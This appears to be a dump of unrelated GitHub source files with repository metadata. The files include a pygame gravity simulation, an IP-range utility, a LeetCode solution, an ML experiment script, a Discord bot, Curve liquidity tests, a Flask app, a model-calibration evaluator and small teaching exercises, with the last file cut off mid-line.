uniform(10, Object.max_density)\n self.mass = self.density = 50\n\n self.radius = 5\n self.calculate_radius()\n\n self.motion_vector = (uniform(-1, 1),\n uniform(-1, 1))\n\n self.collision_box = None\n\n def calculate(self, objects):\n\n net_acceleration = 0, 0\n\n for o in objects:\n vector = self.get_acceleration_vector(o)\n net_acceleration = (net_acceleration[0] + vector[0],\n net_acceleration[1] + vector[1])\n\n self.motion_vector = (self.motion_vector[0] + net_acceleration[0],\n self.motion_vector[1] + net_acceleration[1])\n\n def update_velocity(self, allBodies):\n\n for otherBody in allBodies:\n squareDist = 0\n forceDir = Object.normalize_vector(Object.subtract_vectors(otherBody.position, self.position))\n force = forceDir * config.gravitational_constant * self.mass * otherBody.mass / (2 ** 2)\n\n @staticmethod\n def subtract_vectors(a, b):\n\n if len(a) != len(b):\n raise ArithmeticError('Cannot subtract 2 tuples of different lengths')\n\n c = []\n for i in range(len(a)):\n c.append(a[i] - b[i])\n\n return tuple(c)\n\n def get_acceleration_vector(self, o):\n\n # cos(theta) = adj / hyp\n # hyp = sqrt(x^2 + y^2)\n # cos(theta) = y / hyp\n\n if self == o:\n return 0, 0\n\n try:\n relative_position = (o.position[0] - self.position[0],\n o.position[1] - self.position[1])\n\n hypotenuse = sqrt(relative_position[0] ** 2 + relative_position[1] ** 2)\n\n magnitude = self.get_acceleration_due_to_gravity_from(o)\n\n acceleration_x = magnitude * relative_position[0] / hypotenuse\n acceleration_y = magnitude * relative_position[1] / hypotenuse\n\n return acceleration_x, acceleration_y\n\n except ZeroDivisionError:\n return 0, 0\n\n def update_and_render(self):\n\n self.position = Object.add_tuple(self.position,\n self.motion_vector)\n\n pygame.draw.circle(pygame.display.get_surface(),\n self.get_color(),\n Object.round_tuple(self.position),\n self.radius)\n\n def get_color(self):\n\n # Figure out where this object lies in potential density\n value = self.density / Object.max_density\n # Use that fraction to get how strongly to give it colour\n value = int(255 * value)\n value = 255 - value\n\n return value, value, value\n\n def calculate_radius(self):\n\n volume = self.mass / self.density\n # V = 4 / 3 * pi * r ^ 3\n # r = (V * 3 / 4 / pi) ^ (1/3)\n self.radius = (volume * 3 / 4 / pi) ** (1 / 3)\n self.radius *= 10\n self.radius = int(self.radius)\n\n @staticmethod\n def add_tuple(a, b):\n\n return (a[0] + b[0],\n a[1] + b[1])\n\n @staticmethod\n def round_tuple(x):\n\n return round(x[0]), round(x[1])\n\n def get_acceleration_due_to_gravity_from(self, obj):\n\n # F1 = G * m1 * m2 / r ** 2\n # m1 * a1 = G * m1 * m2 / r ** 2\n # a1 = G * m2 / r ** 2\n\n dist_between = Object.get_distance_between(self.position, obj.position)\n if dist_between > 10 * config.window_size[0]:\n return 0\n\n acceleration_due_to_gravity = config.gravitational_constant * obj.mass / dist_between ** 2\n\n return acceleration_due_to_gravity\n\n def distance_to(self, obj):\n\n delta_x = obj.position[0] - self.position[0]\n delta_y = obj.position[1] - self.position[1]\n\n return sqrt(delta_x ** 2 + delta_y ** 2)\n\n def collides_with(self, obj):\n\n if self == obj:\n return False\n\n combined_radius = self.radius + obj.radius\n dist_between = Object.get_distance_between(self.position, obj.position)\n if combined_radius > dist_between:\n return True\n return False\n\n def check_for_collisions(self, objects):\n\n for o in objects:\n if self.collides_with(o):\n self.mass += o.mass\n\n self_weighting = self.mass / (self.mass + o.mass)\n o_weighting = o.mass / (self.mass + o.mass)\n\n self.motion_vector = (self.motion_vector[0] * self_weighting + o.motion_vector[0] * o_weighting,\n self.motion_vector[1] * self_weighting + o.motion_vector[1] * o_weighting)\n self.calculate_radius()\n # objects.remove(o)\n # o.mass = 0\n o.position = (-1000000, -1000000)\n # TODO: replace this lazy solution (moving far away) with actually removing the object\n # o.isDead = True\n\n @staticmethod\n def get_distance_between(a, b):\n\n delta_x = b[0] - a[0]\n delta_y = b[1] - a[1]\n\n return sqrt(delta_x ** 2 + delta_y ** 2)\n\n @staticmethod\n def normalize_vector(vector):\n \"\"\"Takes a given vector and normalizes it to a magnitude of 1\"\"\"\n\n vector_magnitude = sqrt(vector[0] ** 2 + vector[1] ** 2)\n\n if vector_magnitude == 0:\n return 0, 0\n\n unit_vector = (vector[0] / vector_magnitude,\n vector[1] / vector_magnitude)\n return unit_vector\n\n @staticmethod\n def scale_vector(vector, acceleration):\n\n x = vector[0] * acceleration\n y = vector[1] * acceleration\n\n return x, y\n","repo_name":"Sachbir/Gravity-Simulation","sub_path":"Gravity-Simulation/Object.py","file_name":"Object.py","file_ext":"py","file_size_in_byte":6266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11804536395","text":"#!/usr/bin/env python3\n# coding: utf-8\n# ip_utility.py\n\n\nimport re\nimport ipaddress\n\n\nclass IP_Utility():\n\n # 0.0.0.0\n ip_int_min = int(ipaddress.IPv4Address('0.0.0.0'))\n # 255.255.255.255\n ip_int_max = int(ipaddress.IPv4Address('255.255.255.255'))\n\n\n # 127.0.0.1\n ip0_regex = re.compile(r\"^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$\")\n # 192.0.2.0/29\n ip1_regex = re.compile(r\"^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/\\d{1,2}$\")\n # 192.168.0.1-192.168.0.2\n ip2_regex = re.compile(r\"^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}-\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$\")\n\n\n @staticmethod\n def gen_ip_range(ip_segment):\n if re.match(IP_Utility.ip0_regex, ip_segment) is not None:\n return [ int(ipaddress.IPv4Address(ip_segment)) ]\n elif re.match(IP_Utility.ip1_regex, ip_segment) is not None:\n return [ int(x) for x in ipaddress.ip_network(ip_segment).hosts() ]\n elif re.match(IP_Utility.ip2_regex, ip_segment) is not None:\n start, end = ip_segment.split('-')\n start = int(ipaddress.IPv4Address(start))\n end = int(ipaddress.IPv4Address(end))\n if start <= end:\n return list(range(start, end+1))\n\n\n @staticmethod\n def get_ip_neighbors(ip, context=3):\n ip_int = None\n if isinstance(ip, int):\n ip_int = ip\n elif isinstance(ip, str):\n ip_int = int(ipaddress.IPv4Address(ip))\n start = max(IP_Utility.ip_int_min, ip_int - context)\n end = min(IP_Utility.ip_int_max, ip_int + context)\n return list(range(start, end+1))\n # return list(map(lambda x: ipaddress.IPv4Address(x), range(start, end+1)))\n\n\nif __name__ == '__main__':\n print(IP_Utility.get_ip_neighbors('192.0.2.0'))\n\n print(IP_Utility.gen_ip_range('127.0.0.1'))\n print(IP_Utility.gen_ip_range('192.0.2.0/29'))\n print(IP_Utility.gen_ip_range('192.168.0.1-192.168.0.3'))\n\n\n\n\n","repo_name":"zeekvfu/proxy-crawler","sub_path":"src/util/ip_utility.py","file_name":"ip_utility.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6571423905","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def verticalOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n \n if root is None:\n return list()\n \n res = dict()\n queue = [(root, 0)] # 0 is the vertical level\n while len(queue) > 0:\n newQ = list()\n for (node, vlevel) in queue:\n if vlevel not in res:\n res[vlevel] = [node.val]\n else:\n res[vlevel].append(node.val)\n if node.left is not None:\n newQ.append((node.left, vlevel-1))\n if node.right is not None:\n newQ.append((node.right, vlevel+1))\n queue = newQ\n return [res[vlev] for vlev in sorted(res)]\n","repo_name":"patrick-luo/Leet-Code","sub_path":"314. Binary Tree Vertical Order Traversal.py","file_name":"314. Binary Tree Vertical Order Traversal.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74871359846","text":"import argparse\nimport tensorflow as tf\n\nfrom ..datasets.NoiseGenerator import NoiseGenerator\nfrom .Experiment import Experiment\nfrom ..models.DenoisingUnetModel import DenoisingUnetModel\nfrom ..datasets.DatasetFeeder import DatasetFeeder\nfrom ..datasets.muscima.Muscima import Muscima\nfrom ..datasets.SegmentationDescription import SegmentationDescription\n\n\nclass Options:\n def __init__(self, **kwargs):\n self.seed: int = kwargs[\"seed\"]\n self.epochs: int = kwargs[\"epochs\"]\n self.batch_size: int = kwargs[\"batch_size\"]\n self.validation_ratio: float = kwargs[\"validation_ratio\"]\n self.sup_ratio: float = kwargs[\"sup_ratio\"]\n self.unsup_ratio: float = kwargs[\"unsup_ratio\"]\n\n\nclass Ex01_SemisupUnet(Experiment):\n @property\n def name(self):\n return \"01-semisup-unet\"\n\n def describe(self):\n return \"\"\"\n Train a denoising semi-supervised unet model on the muscima++ dataset\n on various sup-unsup training data splits with the goal of\n segmenting noteheads and measure the resulting F1 score for the\n muscima++ test set.\n \"\"\"\n\n def define_arguments(self, parser: argparse.ArgumentParser):\n parser.add_argument(\"-n\", \"--number\")\n\n def run(self, args: argparse.Namespace):\n opts = Options(\n seed=42,\n epochs=50,\n batch_size=2,\n validation_ratio=0.1,\n sup_ratio=0.05,\n unsup_ratio=0.05\n )\n self.compute_single_instance(opts)\n\n # \"\"\"\n # Possible values to search through:\n # seed=[0, 1, 2, 3, 4]\n # sup_ratio=0.05,\n # unsup_ratio=[0.0, 0.05, 0.1, 0.3, 0.5],\n # batch_size=[2, 4, 8, 16, 32]\n # \"\"\"\n\n # # C (different ratios)\n # for unsup_ratio in [0.0, 0.05, 0.1, 0.3, 0.5]:\n # opts = Options(\n # seed=0,\n # epochs=75,\n # batch_size=16,\n # validation_ratio=0.1,\n # sup_ratio=0.05,\n # unsup_ratio=unsup_ratio\n # )\n # self.compute_single_instance(opts)\n \n # # A (small batches)\n # opts = Options(\n # seed=42,\n # epochs=10,\n # batch_size=2,\n # validation_ratio=0.1,\n # sup_ratio=0.05,\n # unsup_ratio=0.5\n # )\n # self.compute_single_instance(opts)\n\n # # B (large batches)\n # opts = Options(\n # seed=42,\n # epochs=50,\n # batch_size=10,\n # validation_ratio=0.1,\n # sup_ratio=0.05,\n # unsup_ratio=0.5\n # )\n # self.compute_single_instance(opts)\n\n def compute_single_instance(self, opts: Options) -> float:\n tf.random.set_seed(opts.seed)\n\n model_directory = self.experiment_directory(\n self.build_model_name(opts)\n )\n\n noise = NoiseGenerator(\n seed=opts.seed,\n max_noise_size=Muscima.DPSS * 2,\n dropout_ratio=0.25\n )\n\n with DatasetFeeder(self.experiment_directory(\"cache\")) as feeder:\n ds_train, ds_validate, ds_test = \\\n Muscima.semisupervised_experiment_datasets(\n dataset_seed=opts.seed,\n validation_ratio=opts.validation_ratio,\n sup_ratio=opts.sup_ratio,\n unsup_ratio=opts.unsup_ratio,\n batch_size=opts.batch_size,\n segdesc=SegmentationDescription.FLAGS,\n tile_size_wh=(512, 256),\n unsupervised_transformation=noise.dataset_transformation,\n #output_scale_factor=0.25, # TODO: debug\n )\n\n ds_train = feeder(ds_train)\n ds_validate = feeder(ds_validate)\n ds_test = feeder(ds_test)\n\n model = DenoisingUnetModel.load_or_create(model_directory)\n model.perform_training(opts.epochs, ds_train, ds_validate)\n model.perform_evaluation(ds_test)\n\n def build_model_name(self, opts: Options) -> str:\n # outputs: \"experiment-name__foo=42_bar=baz\"\n take_vars = [\"sup_ratio\", \"unsup_ratio\", \"seed\", \"batch_size\"]\n opt_vars = vars(opts)\n vars_list = [v + \"=\" + str(opt_vars[v]) for v in take_vars]\n return \"{}__{}\".format(self.name, \"_\".join(vars_list))\n","repo_name":"Jirka-Mayer/MasterThesis","sub_path":"code/app/experiments/Ex01_SemisupUnet.py","file_name":"Ex01_SemisupUnet.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"70782675687","text":"import glob\nimport os\nfrom subprocess import check_call\nfrom tabnanny import check\nroot = \"D:\\\\raw\\divat\"\n# img_file = \"\"\nsave_path = \"D:\\\\raw\\divat\\\\namcham\"\n\nif not os.path.exists(save_path) :\n os.makedirs(os.path.join(save_path,\"images\"))\n os.makedirs(os.path.join(save_path,\"labels\"))\n\nfiles= []\nfor file in glob.glob(root +\"/labels\"+ \"/*.txt\") :\n # files = []\n name = file.split(\"\\\\\")[-1].split(\".\")[0]\n print(name)\n # break\n check = False\n with open(file,'r') as f :\n lines = f.readlines()\n arr = []\n for line in lines :\n classes = line.split(' ')[0]\n arr.append(classes)\n # print(arr)cd \n if len(arr) == 1 or len(arr) == 0 :\n if '2' not in arr :\n # print(arr)\n # print(file)\n # print(file.split('\\\\')[-1])\n check = True\n\n check = True\n # # print(check)\n if check:\n files.append(file)\n os.replace(file,os.path.join(save_path,\"labels\",file.split(\"\\\\\")[-1]))\n os.replace(os.path.join(root,\"images\",name + \".bmp\"),os.path.join(save_path,\"images\",name + \".bmp\"))\n\n# print(files)\n# for \n# os.replace()\n\n # print(files)\n","repo_name":"DuyLocHoang/JS-tutorial","sub_path":"filter-train.py","file_name":"filter-train.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26016591935","text":"import os\nfrom os.path import isfile, join\nimport sys\nimport traceback\n\nimport discord\nfrom discord.ext import commands\n\nfrom constants import Constants\n\nbot = commands.Bot(\n command_prefix=commands.when_mentioned_or(Constants.prefix),\n description='A Fursona Pins Discord bot!',\n case_insensitive=True)\nbot.remove_command('help')\n\nif __name__ == '__main__':\n for extension in [f.replace('.py', '') for f in os.listdir(Constants.cogs_directory) if isfile(join(Constants.cogs_directory, f))]:\n try:\n bot.load_extension(f'{Constants.cogs_directory}.{extension}')\n except (discord.ClientException, ModuleNotFoundError):\n if extension == '.DS_Store':\n pass\n else:\n print(f'Failed to load extension {extension}.', file=sys.stderr)\n traceback.print_exc()\n\n\n@bot.event\nasync def on_ready():\n print(f'Logged in as {bot.user.name} (ID: {bot.user.id})')\n print('--------')\n print(f'Discord.py Version: {discord.__version__}')\n print('--------')\n print(f'Use this link to invite {bot.user.name}: https://discordapp.com/oauth2/authorize?client_id={bot.user.id}&scope=bot&permissions=511040')\n print('--------')\n print(f'You are running {bot.user.name} v{Constants.version}')\n print('Created by Haru#5616')\n await bot.change_presence(activity=discord.Game(Constants.playing_text), status=discord.Status.online)\n\n\n@bot.event\nasync def on_command_error(_, error):\n if isinstance(error, commands.CommandNotFound):\n return\n raise error\n\nbot.run(Constants.discord_token, bot=True)\n","repo_name":"haruyuki/fursona-pins","sub_path":"fursona_pins.py","file_name":"fursona_pins.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27576482477","text":"class Solution(object):\n def longestPalindrome(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n \n # consider \"even\" and \"odd\" palindromes\n # start at center and expand outwards until no longer palindrome\n # loop through array, saving max palindrome at each step\n \n p = \"\"\n \n for i in range(len(s)): \n even = self.isPalindrome(s, i, i+1)\n odd = self.isPalindrome(s, i, i)\n\n p = max((p, even, odd), key = lambda x: len(x))\n \n \n return p\n \n def isPalindrome(self, s, l, r):\n \n # keep expanding ends until break\n # update counters at each step\n \n while l >= 0 and r < len(s) and s[l] == s[r]:\n l -= 1\n r += 1\n \n return s[l+1:r]","repo_name":"allenchng/Bit-O-Code","sub_path":"leetcode/Python/Leetcode 5 Longest Palindromic Substring.py","file_name":"Leetcode 5 Longest Palindromic Substring.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8023913551","text":"#!/usr/bin/env python3\n\nfrom packet import Packet\n\nif '__main__' == __name__:\n done = False\n\n while not done:\n try:\n line = input()\n packet = Packet(line)\n print(packet.version_sum())\n print(packet.value)\n except:\n done = True\n","repo_name":"messerman/advent_of_code_2021","sub_path":"day16.py","file_name":"day16.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13594540357","text":"total = 0\nimport random\nwhile True:\n print('~~' * 12)\n print(' ' * 5, 'PAR OU IMPAR')\n print('~~' * 12)\n pc = random.randint(1, 10)\n pi = 'h'\n while pi not in 'PI':\n pi = str(input('Par ou Impar:[P/I] ')).upper().strip()[0]\n n = int(input('Digite um número: '))\n soma = n + pc\n print('__' * 12)\n print(f'Você jogou {n} e o computador {pc}')\n if soma % 2 == 0:\n nf = 'PAR'\n elif not soma % 2 == 0:\n nf = 'IMPAR'\n print(f'A soma deu {soma}, valor deu {nf}')\n if pi in 'P' and nf == 'PAR':\n print('Você VENCEU')\n total += 1\n elif pi in 'I' and nf == 'IMPAR':\n print('Você VENCEU')\n total += 1\n else:\n print('Você PERDEU')\n break\nprint('______O JOGO ACABOU______')\nprint('')\nprint(' RANKING PAR OU IMPAR ')\nprint('__' * 15)\nprint(f'''Vitórias Consecutivas = {total}\nmais de 10 vitórias = Uma Máquina\n8 até 10 vitorias = Aulas\n4 a 7 vitórias = bom\n1 a 3 vitórias = Normal\n0 vitória = Não teve infância''')","repo_name":"Xaixen/Python3","sub_path":"Exercícios 1/jogo par ou imp.py","file_name":"jogo par ou imp.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5046505884","text":"import brownie\nimport pytest\n\npytestmark = pytest.mark.usefixtures(\"mint_alice\", \"approve_zap\")\n\n\n@pytest.mark.parametrize(\"min_amount\", (False, True))\ndef test_initial(\n alice,\n zap,\n swap,\n underlying_coins,\n wrapped_coins,\n pool_token,\n underlying_decimals,\n n_coins,\n initial_amounts,\n min_amount,\n):\n amounts = [10**i for i in underlying_decimals]\n min_amount = 10**18 * n_coins if min_amount else 0\n\n zap.add_liquidity(amounts, min_amount, {'from': alice})\n\n zipped = zip(underlying_coins, wrapped_coins, amounts, initial_amounts)\n for underlying, wrapped, amount, initial in zipped:\n assert underlying.balanceOf(alice) == initial - amount\n\n if wrapped == underlying:\n assert underlying.balanceOf(zap) == 0\n assert underlying.balanceOf(swap) == amount\n else:\n assert underlying.balanceOf(zap) == 0\n assert underlying.balanceOf(swap) == 0\n assert wrapped.balanceOf(alice) == initial\n assert wrapped.balanceOf(zap) == 0\n assert wrapped.balanceOf(swap) == amount\n\n assert pool_token.balanceOf(alice) == n_coins * 10**18\n assert pool_token.totalSupply() == n_coins * 10**18\n\n\n@pytest.mark.itercoins(\"idx\")\ndef test_initial_liquidity_missing_coin(alice, zap, pool_token, idx, underlying_decimals):\n amounts = [10**i for i in underlying_decimals]\n amounts[idx] = 0\n\n with brownie.reverts():\n zap.add_liquidity(amounts, 0, {'from': alice})\n","repo_name":"0xftrestech/curve-contract","sub_path":"tests/zaps/common/test_add_liquidity_initial_zap.py","file_name":"test_add_liquidity_initial_zap.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"33039794508","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/8/9 15:10\n# @File : test_eval.py\n\nimport os\nimport numpy as np\nimport json\nimport time\nimport argparse\nimport sys\n# sys.path.append('../')\nfrom sklearn.metrics import confusion_matrix\n\n\ndef eval_accuracy(all_label_probs, test_labels, labels_dict_sorted, mode=None, p_cf=None, f_log=None):\n # evaluate the accuracy with and without contextual calibration\n num_classes = all_label_probs.shape[1]\n if p_cf is None:\n # do not calibrate\n W = np.identity(num_classes)\n b = np.zeros([num_classes, 1])\n else:\n # calibrate\n if mode == \"diagonal_W\":\n W = np.linalg.inv(np.identity(num_classes) * p_cf)\n b = np.zeros([num_classes, 1])\n elif mode == \"identity_W\":\n W = np.identity(num_classes)\n b = -1 * np.expand_dims(p_cf, axis=-1)\n else:\n assert False\n f_log.write('num_classes:{}'.format(num_classes)+ '\\n')\n f_log.write('p_cf_w:{}'.format(W)+ '\\n')\n f_log.write('p_cf_b:{}'.format(b)+ '\\n')\n\n correctness_list = []\n #print(len(all_label_probs))\n #print(len(test_labels))\n assert len(all_label_probs) == len(test_labels)\n pred_labels = []\n for label_probs, true_label in zip(all_label_probs, test_labels):\n f_log.write('before normalize:{}'.format(label_probs)+ '\\n')\n label_probs = label_probs / np.sum(label_probs) # normalize to 1\n f_log.write('after normalize to 1:{}'.format(label_probs)+ '\\n')\n calibrate_label_probs = np.matmul(W, np.expand_dims(label_probs, axis=-1)) + b\n f_log.write('after calibrate label probs:{}'.format(calibrate_label_probs)+ '\\n')\n \n ## 扩充label方案\n ## 以tnews为例,计算到此处calibrate_label_probs75维,即每个标签校正后结果\n ## 然后每5个数值取平均,再通过最大值获取对应标签值\n #calibrate_label_probs1 = calibrate_label_probs.reshape((len(labels_dict_sorted), -1))\n #calibrate_label_probs2 = np.average(calibrate_label_probs1, axis=1) # 按行求均值\n #ans_label = np.argmax(calibrate_label_probs2)\n\n ans_label = np.argmax(calibrate_label_probs)\n f_log.write('np argmax:{}'.format(ans_label)+ '\\n')\n ans_label = labels_dict_sorted[ans_label]\n f_log.write('pred label:{}'.format(ans_label)+ '\\n')\n f_log.write('true label:{}'.format(true_label)+ '\\n')\n pred_labels.append(ans_label)\n if str(ans_label) == str(true_label):\n correctness_list.append(1)\n print('same' + '\\t' + str(true_label) + '\\t' + str(ans_label))\n f_log.write('pred and true label is same'+ '\\n')\n else:\n correctness_list.append(0)\n print('diff' + '\\t' + str(true_label) + '\\t' + str(ans_label))\n f_log.write('pred and true label is different'+ '\\n')\n return np.mean(correctness_list), pred_labels\n\n\ndef get_probs_labels(input_params):\n task_type = input_params.task_type\n path = input_params.data_path\n output_path = input_params.output_path\n #output_results_path = os.path.join(output_path, task_type)\n output_results_path = output_path\n os.makedirs(output_results_path, exist_ok=True)\n f_log = open(os.path.join(output_results_path, 'log.txt'), 'w', encoding='utf-8')\n # with open('./result.txt', 'a+', encoding='utf-8') as f:\n # f.write('localtime: {}'.format(time.asctime(time.localtime(time.time()))) + '\\n')\n\n test_labels_path = os.path.join(path, task_type, 'test_labels.txt')\n # test_labels_path = args.test_labels_file\n with open(test_labels_path, 'r', encoding='utf-8') as f_labels:\n labels_str = f_labels.readlines()\n test_labels = [label.strip('\\n') for label in labels_str]\n # print(len(test_labels))\n f_log.write('test_labels:{}'.format(test_labels) + '\\n')\n\n labels_dict_path = os.path.join(path, task_type, 'labels.json')\n # labels_dict_path = args.sample_class_file\n with open(labels_dict_path, 'r', encoding='utf-8') as f_labels_dict:\n # labels_dict_str = f_labels_dict.read().replace(\"'\", \"\\\"\")\n labels_dict = json.load(f_labels_dict)\n #print(labels_dict)\n f_log.write('labels_dict:{}'.format(labels_dict) + '\\n')\n\n labels_dict_sorted = list(labels_dict.keys())\n #print(labels_dict_sorted)\n f_log.write('labels_dict_sorted:{}'.format(labels_dict_sorted) + '\\n')\n\n # labels_dict_inv = {value[0]: key for key, value in labels_dict.items()}\n # print (\"按值(value)排序:\")\n # print(sorted(labels_dict.items(), key = lambda kv:(kv[1], kv[0])))\n\n probs_path = os.path.join(output_results_path, 'output_logits.txt')\n\n all_label_probs = []\n with open(probs_path, 'r', encoding='utf-8') as f_labels:\n probs_str = f_labels.readlines()\n # prob_list = []\n for prob_str in probs_str:\n if \"Logits:\" not in prob_str:\n continue\n else:\n probs = json.loads(prob_str.strip('\\n').split(\"Logits:\")[-1].replace(\"'\", \"\\\"\"))\n # print(probs)\n prob_list=probs[1:]\n all_label_probs.append(prob_list)\n\n all_label_probs = np.array(all_label_probs)\n acc_original, pred_labels_org = eval_accuracy(all_label_probs, test_labels, labels_dict_sorted, f_log=f_log)\n\n logits_free_path = os.path.join(output_results_path, 'output_logits_pcf.txt')\n #logits_free_path = os.path.join(output_results_path, 'output_logits.txt')\n if os.path.exists(logits_free_path):\n p_cf = get_p_content_free(logits_free_path)\n else:\n p_cf = None\n acc_calibrated, pred_labels_cal = eval_accuracy(all_label_probs, test_labels, labels_dict_sorted, mode=\"diagonal_W\", p_cf=p_cf, f_log=f_log)\n accuracies = [acc_original, acc_calibrated]\n print(f\"Accuracies: {accuracies}\")\n print(f\"p_cf : {p_cf}\")\n\n f_log.close()\n with open(os.path.join(output_results_path, 'result_acc.txt'), 'w', encoding='utf-8') as f:\n f.write(\"task: {}, original acc and calibrated acc: {}\".format('cla', accuracies) + '\\n')\n f.write(\"p_cf: {}\".format(p_cf) + '\\n')\n\n with open(os.path.join(output_results_path, 'result_preds.txt'), 'w', encoding='utf-8') as f_preds:\n f_preds.write('true_label' + '\\t' +'pred_label_org' + '\\t' + 'perd_label_cal' + '\\n')\n for true_label, label_org, label_cal in zip(test_labels, pred_labels_org, pred_labels_cal):\n f_preds.write(str(true_label) + '\\t' +str(label_org) + '\\t' + str(label_cal) + '\\n')\n\n cm_org = confusion_matrix(test_labels, pred_labels_org, labels=labels_dict_sorted)\n cm_cal = confusion_matrix(test_labels, pred_labels_cal, labels=labels_dict_sorted)\n\n print(\"confusion matrix before calibration\")\n print(cm_org)\n print(\"confusion matrix after calibration\")\n print(cm_cal)\n labels_dict_inv = [value[0] for key, value in labels_dict.items()]\n f_preds.write(\"\\nconfusion matrix before calibration\\n\")\n for label in labels_dict_inv:\n f_preds.write('\\t' + label)\n f_preds.write('\\n')\n for i in range(len(cm_org)):\n f_preds.write(labels_dict_inv[i] + '\\t')\n for j in range(len(cm_org)):\n f_preds.write(str(cm_org[i][j]) + '\\t')\n f_preds.write('\\n')\n\n f_preds.write(\"\\nconfusion matrix after calibration\\n\")\n for label in labels_dict_inv:\n f_preds.write('\\t' + label)\n f_preds.write('\\n')\n for i in range(len(cm_cal)):\n f_preds.write(labels_dict_inv[i] + '\\t')\n for j in range(len(cm_cal)):\n f_preds.write(str(cm_cal[i][j]) + '\\t')\n f_preds.write('\\n')\n\n\ndef get_p_content_free(logits_free_path):\n all_p_y = []\n with open(logits_free_path, 'r', encoding='utf-8') as f_labels:\n probs_str = f_labels.readlines()\n for prob_str in probs_str:\n if \"Logits:\" not in prob_str:\n continue\n else:\n probs = json.loads(prob_str.strip('\\n').split(\"Logits:\")[-1].replace(\"'\", \"\\\"\"))\n prob_list = probs[1:]\n all_p_y.append(prob_list)\n p_y = np.mean(np.array(all_p_y), axis=0)\n p_y = p_y / np.sum(p_y) # normalize\n return p_y\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='eval')\n parser.add_argument('--data_path', default='./tasks/fewclue_text', type=str)\n parser.add_argument('--output_path', default='./', type=str)\n parser.add_argument('--task_type', default='tnews', type=str)\n input_params = parser.parse_args()\n\n get_probs_labels(input_params)\n pass\n","repo_name":"Shawn-Inspur/Yuan-1.0","sub_path":"src/tools/generate_eval.py","file_name":"generate_eval.py","file_ext":"py","file_size_in_byte":8677,"program_lang":"python","lang":"en","doc_type":"code","stars":588,"dataset":"github-code","pt":"53"} +{"seq_id":"70049257449","text":"from flask import Flask\nfrom flask import render_template, request, flash\nfrom flask import redirect, url_for\nfrom flask import jsonify\nimport json, requests\napp = Flask(__name__)\n\n##Settings\napp.secret_key = 'secreto2'\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/cajero', methods=['POST'])\ndef cajero():\n if request.method == 'POST':\n idc = request.form['idc']\n fecha = request.form['fecha']\n ruta = 'http://127.0.0.1:5000/cajero/' + idc\n try:\n datos = requests.get(ruta)\n resp = json.loads(datos.content)\n print(resp)\n except:\n return 'Hubo un error'\n return render_template('cajero.html', messages=resp)\n\n@app.route('/usuario', methods=['POST'])\ndef usuario():\n if request.method == 'POST':\n usuario_id = request.form['usuario_id']\n nombre = request.form['nombre']\n ap_pat = request.form['ap_pat']\n ruta = 'http://127.0.0.1:5000/usuario/' + usuario_id\n try:\n datos = requests.get(ruta)\n resp = json.loads(datos.content)\n print(resp)\n except:\n return 'Hubo un error'\n return render_template('cuentas.html', messages=resp)\n\n@app.errorhandler(404)\ndef not_found(error=None):\n message = {\n 'status' : 404,\n 'message' : 'Not Found ' + request.url,\n }\n resp = jsonify(message)\n return resp\n\nif __name__ == '__main__':\n app.run(debug =True, port = 9000)","repo_name":"galigaribaldi/Proyectos_SD","sub_path":"Proyecto1/API_Cliente/app2.py","file_name":"app2.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3283643926","text":"from tkinter import *\n\nclass Application(Frame):\n def __init__(self, master):\n super().__init__(master)\n self.grid()\n self.create_widgets()\n def create_widgets(self):\n self.btn1 = Button(self, text = 'кнопка 1')\n self.btn1.grid()\n self.btn2 = Button(self)\n self.btn2.grid()\n self.btn2.configure(text = 'кнопка 2')\n self.btn3 = Button(self)\n self.btn3.grid()\n self.btn3['text'] = 'кнопка 3'\n\ndef main():\n root = Tk()\n root.title('окно с кнопками')\n root.geometry('400x200')\n app = Application(master = root)\n root.mainloop()\n\nmain()\n","repo_name":"aomay/python_M.Douson","sub_path":"10/кнопки_объектно/buttons_obj.py","file_name":"buttons_obj.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71573414889","text":"import sys\nimport os\nimport logging.handlers\nimport logging\nfrom commons.variables import (\n ENCODING, LOGGING_LEVEL, LOGGING_FORMAT, LOGGER_CRITICAL, LOGGER_INFO, LOGGER_DEBUG, LOGGER_ERROR\n)\n\nSERVER_FORMATTER = 